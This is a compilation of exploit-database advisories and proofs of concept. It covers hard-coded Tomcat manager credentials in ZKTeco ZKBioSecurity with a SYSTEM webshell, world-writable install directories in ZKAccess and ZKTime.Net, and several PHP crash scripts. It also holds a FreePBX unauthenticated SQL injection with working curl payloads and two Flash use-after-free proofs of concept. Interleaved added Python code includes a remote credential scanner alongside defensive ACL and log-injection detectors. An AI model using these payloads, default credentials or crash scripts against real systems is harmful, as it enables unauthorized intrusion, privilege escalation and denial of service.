attacker can upload a malicious WAR archive containing a JSP application and
thereby execute arbitrary code with SYSTEM privileges.

Ref: https://www.exploit-db.com/exploits/31433/


Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)
           Apache-Coyote/1.1
           Apache Tomcat/7.0.56


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5362
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5362.php


18.07.2016

--


Contents of tomcat-users.xml:
-----------------------------

C:\Program Files (x86)\BioSecurity\MainResource\tomcat\conf\tomcat-users.xml:

<?xml version='1.0' encoding='utf-8'?>
...
...
...
<role rolename="manager-gui"/>  
<role rolename="manager-script"/>  
<role rolename="manager-jmx"/>  
<role rolename="manager-status"/>  
<user password="zkt123" roles="manager-gui,manager-script,manager-jmx,manager-status" username="zkteco"/>  
</tomcat-users>

-----------------------------


Open Manager application and login:
-----------------------------------

http://127.0.0.1:8088/manager (zkteco:zkt123)


Deploy JSP webshell, issue command:
-----------------------------------

- Request: whoami
- Response: nt authority\system


To call the findConnectors() method of the Service, use:
----------------------------------------------------

http://127.0.0.1:8088/manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=

Response:

OK - Operation findConnectors returned:
  Connector[HTTP/1.1-8088]
  Connector[AJP/1.3-8019]


List of all loaded servlets:
----------------------------

http://127.0.0.1:8088/manager/jmxproxy/?j2eeType=Servlet
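Two of the ZKBioSecurity issues above are checkable with a single unauthenticated GET each: the xmlPath traversal (ZSL-2016-5365) and the Tomcat manager reachable with zkteco:zkt123 (ZSL-2016-5362). The following is an added example, not ZeroScience's code, that turns both into a scanner. The probe paths and credentials are the ones quoted in the advisories; the HTTP transport is a pluggable fetch function so the checks can be exercised offline, and the responses in constructed_fetch() are constructed, not captured from a real install.

```python
"""Remote checks for the ZKBioSecurity 3.0 xmlPath traversal and the
hard-coded Tomcat manager account. Added example, not ZeroScience's code."""
import base64
import sys
from typing import Callable, Dict, List, Optional, Tuple
from urllib.error import HTTPError
from urllib.request import Request, urlopen

Fetch = Callable[[str, Dict[str, str]], Tuple[int, str]]   # (url, headers) -> (status, body)

# Taken from the advisories above.
XML_PATH_PROBE = "/baseAction!getPageXML.action?xmlPath=/vid/../WEB-INF/web.xml"
JMXPROXY_PROBE = "/manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps="
MANAGER_CREDS = ("zkteco", "zkt123")


def urllib_fetch(url: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """Real transport: GET the URL, returning status and body even on 4xx/5xx."""
    try:
        with urlopen(Request(url, headers=headers), timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def basic_auth(user: str, password: str) -> str:
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def check_path_manipulation(base: str, fetch: Fetch = urllib_fetch) -> Optional[str]:
    """Return web.xml if the traversal escapes /vid/ into WEB-INF, else None."""
    status, body = fetch(base.rstrip("/") + XML_PATH_PROBE, {})
    # the deployment descriptor is the only thing that legitimately contains <web-app
    return body if status == 200 and "<web-app" in body else None


def check_manager_creds(base: str, fetch: Fetch = urllib_fetch) -> Optional[List[str]]:
    """Return the connectors listed by jmxproxy if zkteco:zkt123 still works, else None."""
    status, body = fetch(base.rstrip("/") + JMXPROXY_PROBE,
                         {"Authorization": basic_auth(*MANAGER_CREDS)})
    if status != 200 or not body.startswith("OK - Operation findConnectors returned"):
        return None
    return [line.strip() for line in body.splitlines()[1:] if line.strip()]


def constructed_fetch(url: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """Offline stand-in that answers like an unpatched install (constructed responses)."""
    if url.endswith(XML_PATH_PROBE):
        return 200, '<?xml version="1.0"?><web-app><display-name>BioSecurity</display-name></web-app>'
    if "/manager/jmxproxy/" in url:
        if headers.get("Authorization") == basic_auth(*MANAGER_CREDS):
            return 200, ("OK - Operation findConnectors returned:\n"
                         "  Connector[HTTP/1.1-8088]\n  Connector[AJP/1.3-8019]\n")
        return 401, "Unauthorized"
    return 404, "Not Found"


if __name__ == "__main__":
    # With a base URL on the command line the real transport is used; otherwise the offline stub.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8088"
    fetch = urllib_fetch if len(sys.argv) > 1 else constructed_fetch
    web_xml = check_path_manipulation(target, fetch)
    print("[%s] xmlPath traversal to WEB-INF/web.xml" % ("+" if web_xml else "-"))
    connectors = check_manager_creds(target, fetch)
    print("[%s] manager login as zkteco:zkt123%s" % (
        "+" if connectors else "-", ": " + ", ".join(connectors) if connectors else ""))
```

A 401 from jmxproxy means the bundled account has been changed or the manager application removed, which is the fix to verify after hardening; jmxproxy is used for the check rather than the HTML manager page because its first line is stable and machine-readable.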
            
ZKTeco ZKAccess Professional 3.5.3 Insecure File Permissions


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.5.3 (Build 0005)

Summary: ZKAccess 3.5 is a desktop software which is suitable
for small and medium businesses application. Compatible with
all ZKAccess standalone reader controllers, the software can
simultaneously manage access control and generate attendance
report. The brand new flat GUI design and humanized structure
of new ZKAccess 3.5 will make your daily management more pleasant
and convenient.

Desc: ZKAccess suffers from an elevation of privileges vulnerability: any
authenticated user can replace the application's executable file with a
binary of their choice. The vulnerability exists due to improper permissions
on the install directory, which grant the 'M' flag (Modify) to the
'Authenticated Users' group.


Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5361
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5361.php


18.07.2016

--


C:\ZKTeco>icacls ZKAccess3.5
ZKAccess3.5 BUILTIN\Administrators:(I)(F)
            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
            BUILTIN\Users:(I)(OI)(CI)(RX)
            NT AUTHORITY\Authenticated Users:(I)(M)
            NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

Successfully processed 1 files; Failed processing 0 files
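The listing above is what a privilege-escalation review looks for: a principal every local user holds (Authenticated Users here, Everyone in the ZKTime.Net advisory that follows) with a write-class right on program files. The following added example (not ZeroScience's code) parses icacls output into ACEs and flags those entries; it handles the icacls format only, not the older cacls/showacls output, and the sample it runs on is the listing copied from the ZKAccess advisory.

```python
"""Flag ACEs that let low-privileged principals modify an install directory.

Added example, not ZeroScience's code. Parses `icacls <path>` output for one
object (no /t); SAMPLE_ICACLS is the listing from the ZKAccess advisory.
"""
import re
from typing import List, NamedTuple

# Principals that any local user is a member of; write access for them on
# program files is a local privilege escalation.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}
# icacls inheritance/propagation flags, as opposed to rights.
INHERITANCE_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# Simple and specific icacls rights that allow changing or replacing files.
WRITE_RIGHTS = {"F", "M", "W", "D", "GA", "GW", "WD", "AD", "WA", "WEA", "DC", "DE", "WDAC", "WO"}

ACE_RE = re.compile(r"^(?P<principal>[^:]+?):(?P<tokens>(?:\([^)]*\))+)$")


class Ace(NamedTuple):
    principal: str
    flags: List[str]
    rights: List[str]


def parse_icacls(output: str, path: str) -> List[Ace]:
    """Parse the output of `icacls <path>` into ACEs."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path + " "):          # the first ACE shares its line with the path
            line = line[len(path) + 1:].strip()
        m = ACE_RE.match(line)
        if not m:
            continue                             # blank lines, "Successfully processed ..."
        flags, rights = [], []
        for tok in re.findall(r"\(([^)]*)\)", m.group("tokens")):
            for part in tok.split(","):          # specific rights come comma-separated in one group
                part = part.strip()
                (flags if part in INHERITANCE_FLAGS else rights).append(part)
        aces.append(Ace(m.group("principal").strip(), flags, rights))
    return aces


def weak_aces(aces: List[Ace]) -> List[Ace]:
    """ACEs granting write-class rights to principals every local user holds."""
    return [a for a in aces
            if a.principal.lower() in LOW_PRIV_PRINCIPALS
            and any(r in WRITE_RIGHTS for r in a.rights)]


SAMPLE_ICACLS = """\
ZKAccess3.5 BUILTIN\\Administrators:(I)(F)
            BUILTIN\\Administrators:(I)(OI)(CI)(IO)(F)
            NT AUTHORITY\\SYSTEM:(I)(F)
            NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F)
            BUILTIN\\Users:(I)(OI)(CI)(RX)
            NT AUTHORITY\\Authenticated Users:(I)(M)
            NT AUTHORITY\\Authenticated Users:(I)(OI)(CI)(IO)(M)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for ace in weak_aces(parse_icacls(SAMPLE_ICACLS, "ZKAccess3.5")):
        print("[!] %s: %s (%s)" % (ace.principal, ",".join(ace.rights), ",".join(ace.flags) or "-"))
```

The two flagged entries are the (I)(M) on the directory itself and the (I)(OI)(CI)(IO)(M) that every file and sub-directory created under it inherits; the (I) shows the grant is inherited from the parent, so the fix belongs on C:\ZKTeco, not on the ZKAccess3.5 folder alone.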
            
<?php
#############################################################################
## PHP 7.0 AppendIterator::append Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 31/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
$tmp = new AppendIterator();
$tmp->append($tmp); // Crash
?>
            
ZKTeco ZKTime.Net 3.0.1.6 Insecure File Permissions


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.6
                  3.0.1.5 (160622)
                  3.0.1.1 (160216)

Summary: ZKTime.Net V3.0 is a new generation time attendance
management software. Meanwhile, it integrates with time attendance
and access control system. Some frequently used functions such as
attendance reports, device management and employee management can
be managed directly on the home page which providing excellent user
experience. Owing to the Pay code function, it can generate both
time attendance records and corresponding payroll in the software
and easy to merge with the most ERP and Payroll software, which can
rapidly upgrade your working efficiency. The brand new flat GUI design
and humanized structure will make your daily management more pleasant
and convenient.

Desc: ZKTime.Net suffers from an elevation of privileges vulnerability: any
local user can replace the executable file with a binary of their choice.
The vulnerability exists due to improper permissions, with the 'C' flag
(Change) granted to the 'Everyone' group, making the entire 'ZKTimeNet3.0'
directory, its files and sub-directories world-writable.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5360
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5360.php


18.07.2016

--


C:\>showacls "c:\Program Files (x86)\ZKTimeNet3.0"
c:\Program Files (x86)\ZKTimeNet3.0
                Everyone                  Change [RWXD]
                NT SERVICE\TrustedInstaller Special Access [A]
                NT AUTHORITY\SYSTEM       Special Access [A]
                BUILTIN\Administrators    Special Access [A]
                BUILTIN\Users             Special Access [RX]
                CREATOR OWNER             Special Access [A]


C:\>showacls "c:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe"
c:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe
                Everyone                  Change [RWXD]



C:\Program Files (x86)>cacls ZKTimeNet3.0
C:\Program Files (x86)\ZKTimeNet3.0 Everyone:(OI)(CI)C
                                    NT SERVICE\TrustedInstaller:(ID)F
                                    NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                    NT AUTHORITY\SYSTEM:(ID)F
                                    NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
                                    BUILTIN\Administrators:(ID)F
                                    BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
                                    BUILTIN\Users:(ID)R
                                    BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
                                                                  GENERIC_READ
                                                                  GENERIC_EXECUTE

                                    CREATOR OWNER:(OI)(CI)(IO)(ID)F


C:\Program Files (x86)\ZKTimeNet3.0>cacls *.exe
C:\Program Files (x86)\ZKTimeNet3.0\LanguageTranslate.exe Everyone:C
                                                          Everyone:(ID)C
                                                          NT AUTHORITY\SYSTEM:(ID)F
                                                          BUILTIN\Administrators:(ID)F
                                                          BUILTIN\Users:(ID)R

C:\Program Files (x86)\ZKTimeNet3.0\unins000.exe Everyone:(ID)C
                                                 NT AUTHORITY\SYSTEM:(ID)F
                                                 BUILTIN\Administrators:(ID)F
                                                 BUILTIN\Users:(ID)R

C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.DBTT.exe Everyone:C
                                                       Everyone:(ID)C
                                                       NT AUTHORITY\SYSTEM:(ID)F
                                                       BUILTIN\Administrators:(ID)F
                                                       BUILTIN\Users:(ID)R

C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe Everyone:C
                                                  Everyone:(ID)C
                                                  NT AUTHORITY\SYSTEM:(ID)F
                                                  BUILTIN\Administrators:(ID)F
                                                  BUILTIN\Users:(ID)R

C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.Update.exe Everyone:C
                                                         Everyone:(ID)C
                                                         NT AUTHORITY\SYSTEM:(ID)F
                                                         BUILTIN\Administrators:(ID)F
                                                         BUILTIN\Users:(ID)R

C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.ZKTime5DB.exe Everyone:C
                                                            Everyone:(ID)C
                                                            NT AUTHORITY\SYSTEM:(ID)F
                                                            BUILTIN\Administrators:(ID)F
                                                            BUILTIN\Users:(ID)R
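As an added example (not part of the advisory), here is a small Python audit of `cacls` output that flags ACEs granting write or delete rights to principals every local account holds (Everyone, BUILTIN\Users, Authenticated Users). The sample text is copied from the `cacls` listing above; the choice of "weak" rights sets is my own.

```python
import re

# A cacls ACE at line end: "<principal>:<inherit flags><perm>" (English cacls output).
ACE_RE = re.compile(r"(?P<principal>Everyone|CREATOR OWNER|[A-Z][A-Z ]*\\[^\s:\\]+)"
                    r":(?P<flags>(?:\([A-Z]{2}\))*)(?P<perm>[A-Z]+|\(special access:\))\s*$")
# Principals every local account holds, and rights that let them replace binaries.
LOW_PRIV = {"Everyone", r"BUILTIN\Users", r"NT AUTHORITY\Authenticated Users"}
WEAK_PERMS = {"C", "F", "W"}  # cacls summary codes: Change, Full, Write
WEAK_SPECIAL = {"GENERIC_WRITE", "GENERIC_ALL", "FILE_WRITE_DATA",
                "FILE_APPEND_DATA", "DELETE", "WRITE_DAC", "WRITE_OWNER"}

def parse_cacls(text):
    """(path, principal, rights) per ACE; rights is a code or a set of special names."""
    entries, path = [], None
    for line in text.splitlines():
        m = ACE_RE.search(line)
        if m:
            prefix = line[:m.start()].strip()
            if prefix:  # only the first ACE line of an object carries its path
                path = prefix
            perm = m.group("perm")
            entries.append((path, m.group("principal"),
                            set() if perm == "(special access:)" else perm))
        elif re.fullmatch(r"\s*[A-Z_]+\s*", line) and entries and isinstance(entries[-1][2], set):
            entries[-1][2].add(line.strip())  # detail line under "(special access:)"
    return entries

def weak_aces(text):
    """ACEs that grant write or delete rights to low-privileged principals."""
    findings = []
    for path, principal, rights in parse_cacls(text):
        if principal not in LOW_PRIV:
            continue
        if isinstance(rights, set):
            bad = rights & WEAK_SPECIAL
            if bad:
                findings.append((path, principal, ",".join(sorted(bad))))
        elif rights in WEAK_PERMS:
            findings.append((path, principal, rights))
    return findings

# Constructed sample: lines copied from the cacls output in the advisory above.
SAMPLE = r"""C:\Program Files (x86)\ZKTimeNet3.0 Everyone:(OI)(CI)C
                                    BUILTIN\Users:(ID)R
                                    BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
                                                                  GENERIC_READ
                                                                  GENERIC_EXECUTE
C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe Everyone:C
                                                  BUILTIN\Users:(ID)R
"""
```

Feed it the saved output of `cacls <dir> /T` to check a whole install tree; on the sample it reports the directory and ZKTimeNet.exe, both writable by Everyone.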
            
<?php
#############################################################################
## PHP 5.0.0 snmpset() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");

$str = str_repeat('A', 9999);
snmpset("localhost", 'public', $str, '', '');
?>
            
<?php
#############################################################################
## PHP 5.0.0 snmprealwalk() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");

$str = str_repeat('A', 9999);
snmprealwalk('127.0.0.1', 'public', $str);
?>
            
<?php
#############################################################################
## PHP 5.0.0 snmpwalk() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");

$str = str_repeat('A', 9999);
snmpwalk('127.0.0.1', 'public', $str);
?>
            
<?php
#############################################################################
## PHP 5.0.0 fbird_[p]connect() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("interbase")) die("You need interbase extension loaded!");

$str = str_repeat('A', 9999);
//fbird_connect($str);
fbird_pconnect($str);
?>
            
<?php
#############################################################################
## PHP 5.0.0 snmpwalkoid() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");

$str = str_repeat('A', 9999);
snmpwalkoid('127.0.0.1', 'public', $str); 
?>
            
<?php
#############################################################################
## PHP 5.0.0 html_doc_file() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");

$str = str_repeat('A', 9999);
html_doc_file($str);
?>      
            
<?php
#############################################################################
## PHP 5.0.0 hw_docbyanchor() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");

hw_docbyanchor(0,0);
?>      
            
Vulnerable software : Freepbx
Tested version : 13.0.35
vendor : freepbx.org
Author : i-Hmx
Email : n0p1337@gmail.com
Home : sec4ever.com

FreePBX suffers from an unauthenticated SQL injection flaw due to insufficient sanitization of the "display" parameter.
 
File : admin/libraries/DB.class.php
    public function getAll($sql,$params=array(),$fetchmode=DB_FETCHMODE_DEFAULT) {
        //this is a sad workaround for people who couldn't follow documentation for functions
        $fetchmode = $this->isFetchMode($params) ? $params : $fetchmode;
        self::$error = null;
        try {
            $fetch = $this->correctFetchMode($fetchmode);
            if(!empty($params) && is_array($params)) {
                $this->res = $this->db->prepare($sql);
    ------->>>>> $this->res->execute($params);
                return $this->res->fetchAll($fetch);
            }
            $this->res = $this->db->query($sql);
            if($this->res === false) {
                return false;
            }
            return $this->res->fetchAll($fetch);
        } catch (Exception $e) {
            return new DB_Error($e);
        }
    }

File : admin/libraries/modulefunctions.class.php
Line 593
        function getinfo($module = false, $status = false, $forceload = false) {

        global $amp_conf, $db;
        $modules = array();

        if ($module) {
            // get info on only one module
            $xml = $this->_readxml($module);
            if (!is_null($xml)) {
                $modules[$module] = $xml;
                // if status is anything else, it will be updated below when we read the db
                $modules[$module]['status'] = MODULE_STATUS_NOTINSTALLED;
            }

            // query to get just this one
    ---===>>>> $sql = 'SELECT * FROM modules WHERE modulename = "'.$module.'"';
        }
        if ($module || !$modulelist->is_loaded()) {
    ---===>>>$results = $db->getAll($sql,DB_FETCHMODE_ASSOC);
            if(DB::IsError($results)) {
                die_freepbx($sql."<br>\n".$results->getMessage());
            }
       
File : admin/libraries/modulefunctions.legacy.php
Line 52
        function module_getinfo($module = false, $status = false, $forceload = false) {
            _module_backtrace();
            $modulef = module_functions::create();
        ---===>>> return $modulef->getinfo($module, $status, $forceload);
        }

File : admin/views/noaccess.php
        <?php
        $display = isset($_REQUEST['display'])?$_REQUEST['display']:false;
    ---===>>> $modinfo = \module_getinfo($display);

The 'display' parameter is concatenated into the SQL statement and executed without prior sanitization, which leads to an obvious SQL injection flaw that requires no authentication.

POC :

Normal request

[root:/fpbx]# curl -o /dev/null -s -w "Total request time : %{time_connect} + %{time_starttransfer} =  %{time_total}\n" 'http://x.x.x.x/admin/config.php?display=f4ris'
Total request time : 0.001 + 0.309 =  0.334

Sql injected

[root:/fpbx]# curl -o /dev/null -s -w "Total request time : %{time_connect} + %{time_starttransfer} =  %{time_total}\n" 'http://x.x.x.x/admin/config.php?display=f4ris"XOR(if(6661=6661,sleep(0.03),0))OR"*/'
Total request time : 0.158 + 4.391 =  4.417

# Mix this with the 13.0.35 RCE one , and you are ok to get root just by echoing asterisk to the sudoers ;)
# We're still ruling the game idiots , from Eg-R1z with dust xDD
# ./f4ris
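Added example, not from the advisory or the FreePBX project: a Python detector that scans web-server access-log lines for requests to admin/config.php whose `display` value carries quote characters, comment sequences or time-based SQL functions like the payload above. The log lines are constructed, and the allowlist regex for module names is an assumption (FreePBX module names are plain identifiers).

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# FreePBX module names are plain identifiers, so 'display' should never carry
# quotes or SQL keywords (assumed allowlist; not taken from the project).
SAFE_DISPLAY = re.compile(r"^[A-Za-z0-9_\-]*$")
# Markers of the quote-break and time-based techniques shown in the advisory.
INJECTION_MARKERS = re.compile(
    r"""['"]|\b(?:sleep|benchmark)\s*\(|\bxor\b|/\*|\*/|--\s""", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def check_request(line):
    """Return (reason, decoded display value) if the log line looks like an
    injection attempt against admin/config.php, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/admin/config.php"):
        return None
    # parse_qs decodes once; unquote again so double-encoded payloads are seen
    for raw in parse_qs(url.query, keep_blank_values=True).get("display", []):
        value = unquote(raw)
        if INJECTION_MARKERS.search(value):
            return ("injection marker", value)
        if not SAFE_DISPLAY.match(value):
            return ("unexpected characters", value)
    return None

def scan_log(text):
    """Apply check_request to each line; return [(line_no, reason, value)]."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        result = check_request(line)
        if result:
            hits.append((n,) + result)
    return hits

# Constructed sample access-log lines; the second carries the advisory's payload.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Aug/2016:10:01:02 +0000] "GET /admin/config.php?display=dashboard HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Aug/2016:10:01:09 +0000] "GET /admin/config.php?display=f4ris%22XOR(if(6661%3D6661,sleep(0.03),0))OR%22*/ HTTP/1.1" 200 5120 "-" "curl/7.47.0"
203.0.113.7 - - [26/Aug/2016:10:02:30 +0000] "GET /admin/config.php?display=extensions&extdisplay=1001 HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
"""
```

Pair the hit with the response time in the same log line: a slow response to a flagged request is the signature of the time-based probe shown above.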
            
<?php
#############################################################################
## PHP 5.0.0 imap_mail() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("imap")) die("You need imap extension loaded!");

$str = str_repeat('A', 9999);
imap_mail($str,'','');
?>      
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=844

There is a use-after-free in the MovieClip Transform getter. If the Transform constructor is replaced with a getter using addProperty, this getter can free the MovieClip before it is accessed. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip( "mc", 1);
var tf = flash.geom.Transform;
var g = flash.geom;
g.addProperty("Transform", func, func);
mc.f = ASnative(900, 419);
mc.f();

function func(){
	mc.removeMovieClip();
	// Fix heap
}


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40311.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=843

There is a use-after-free in BitmapData.copyPixels. If the method is called on a MovieClip, and the MovieClip is deleted during parameter conversions, it is used to convert future parameters, even though it has already been freed. A minimal proof-of-concept follows:

var mc = this.createEmptyMovieClip( "mc", 1);
var b = new flash.display.BitmapData(10, 10, true, 7);
var f = b.copyPixels;
mc.f = f;
mc.f( {}, { x : { valueOf : func}, y : 0, width : 10, height : 10 }, { x : 0, y :0 }, "natalie", { x : 0, y : 0});


function func(){
	mc.removeMovieClip();
	// Fix the heap
}


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40310.zip